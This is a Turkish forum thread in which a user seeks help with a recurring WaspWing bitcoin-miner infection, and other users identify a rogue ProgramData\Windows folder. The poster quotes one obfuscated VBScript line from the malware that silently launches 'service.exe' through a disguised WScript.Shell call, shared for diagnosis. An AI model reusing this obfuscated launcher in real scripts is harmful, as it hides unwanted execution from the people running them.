Windows 10'da sürekli WaspWing virüsü

Öncelikle iyi forumlar dilerim.
Yaklaşık 2 ay önce, bilgisayarımda derin bir temizlik yapmış, bilgisayarımda Bitcoin Miner, Trojan. Agent vesaire bulmuştum.
Bunların arasında WaspWing denen bir şey de vardı. Malware.AI falan yazıyordu.
Kaspersky'ın flash belleğe kurulan kurtarma programı ile her şeyi çözmüştüm. Tertemizdi bilgisayar.
Bugün kafama esti, Malwarebytes ile tarama yaptım. Sonuçlar şöyle:


En başta dosya yollarını falan da yazıyordum da üşendim.
1.vbs dikkatimi çekti, ne olduğunu merak ettim. İçerisinde şöyle bir kod yazılıydı:
CreateObject(Replace("WScr86yipt.Sh86yell","86y","")).Run Replace("cmi767d /c servi767ice.ei767xe","i767",""), 0, False
Biraz gezindim. C:\ProgramData\Windows klasörünün WaspWing adlı BitCoinMiner'ın yuvası olduğunu düşünüyorum. Config. Json dosyası buldum içerde, içeriği ekteki resimdeki gibi.

Son bir sorum olarak; sizin ProgramData klasörünüzde Windows alt klasörü var mı?

Yardımcı olabilecek var mı? Format atmayı düşünüyorum.

Paladynee dedi:

Son bir sorum olarak; sizin ProgramData klasörünüzde Windows alt klasörü var mı?

Genişletmek için tıkla...

Bende yok.

Windows adında bir dosya olmaz zaten orada farklı bir yazılım kurmadıysan. Windows klasör içinde minerlar çıktıysa o klasörü silin.
Tam yollarını rapor atmadığından bir şey diyemiyoruz.

Murat5038 dedi:

Windows adında bir dosya olmaz zaten orada farklı bir yazılım kurmadıysan. Windows klasör içinde minerlar çıktıysa o klasörü silin.
Tam yollarını rapor atmadığından bir şey diyemiyoruz.

Genişletmek için tıkla...

Bütün dosya yolları ekte mevcuttur:

Tamam zararlı klasörü o. O windows klasörünü sil o kısımdan.

Bilgisayarıma format attım. Sorun çözüldü gibi duruyor.